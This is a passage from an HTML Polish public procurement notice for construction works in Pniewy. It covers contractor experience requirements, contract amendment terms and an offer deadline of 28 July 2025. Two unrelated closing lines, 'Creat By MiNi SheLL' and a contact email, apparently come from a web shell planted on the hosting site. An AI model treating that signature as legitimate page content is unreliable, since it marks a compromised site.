budowlaną porównywalną <br/>z przedmiotem zamówienia o wartości brutto minimum 100.000,00 zł <br/>(sto tysięcy złotych), wraz z potwierdzeniem, że roboty te zostały wykonane należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończone,<br/>Dla części II zamówienia: <br/>a)	w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał minimum 1 robotę budowlaną porównywalną <br/>z przedmiotem zamówienia o wartości brutto minimum 30.000,00 zł <br/>(trzydzieści tysięcy złotych), wraz z potwierdzeniem, że roboty te zostały wykonane należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończone,<br/>b)	zapewnienia udziału osoby uprawnionej do pełnienia indywidualnych funkcji w budownictwie - do kierowania robotami w branży budowlanej, który przez co najmniej 18 miesięcy brał udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury,<br/>2.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana zgodnie <br/>z formułą: „spełnia-nie spełnia” na podstawie złożonych oświadczeń, dokumentów wymaganych przez Zamawiającego. Niespełnienie chociaż jednego z ww. warunków skutkować będzie odrzuceniem oferty Wykonawcy.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek określony w ust. 2 pkt 4 lit. a) zostanie spełniony wyłącznie, jeżeli jeden z wykonawców spełni warunek samodzielnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z zapisami SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych we Wzorze Umowy, stanowiącym Załącznik nr 6 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 455 ust. 1 pkt 2 -4 i ust. 2 oraz art. 455 ust. 1 pkt 1- zgodnie z zapisami § 11 wzoru Umowy.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pniewy_wlkp</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-28 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com